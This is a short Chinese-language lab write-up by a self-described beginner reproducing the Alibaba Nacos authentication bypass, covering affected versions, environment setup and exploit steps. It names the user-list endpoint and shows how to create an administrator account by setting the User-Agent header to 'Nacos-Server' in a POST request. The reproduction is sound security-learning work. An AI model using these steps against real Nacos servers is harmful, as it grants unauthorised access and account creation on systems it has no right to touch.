小白复现笔记记录系列:
Alibaba Nacos权限认证绕过漏洞复现
一、漏洞描述
Nacos官方在github发布的issue中披露Alibaba Nacos 存在一个由于不当处理User-Agent导致的未授权访问漏洞。通过该漏洞,攻击者可以进行任意操作,包括创建新用户并进行登录后操作。
二、漏洞影响版本
Nacos <= 2.0.0-ALPHA.1
三、漏洞复现
环境搭建:
1.通过GitHub上下载环境包:
https://github.com/alibaba/nacos/releases/tag/2.0.0-ALPHA.1
2.接着在kali中进行解压安装,开始在centos7中进行安装,结果安装报错,jdk版本需在8.0以上才可安装。
3.解压后,需进入macos的bin目录,在里面清楚windows启动脚本,然后启动单节点模式。
4.访问http://ip:8848/nacos,成功搭建环境。
漏洞复现:
1.访问:http://your-ip:8848/nacos/v1/auth/users?pageNo=1&pageSize=1 可以查看到用户列表。
2.访问http://your-ip:8848/nacos/v1/auth/users
3.burp抓包,修改post包,进行传参:username=XXX&password=YYY,再对User-Agent头进行修改,改为:Nacos-Server,然后发送post请求,返回200,创建用户成功。
4.返回登录界面,尝试账号登录,成功登录。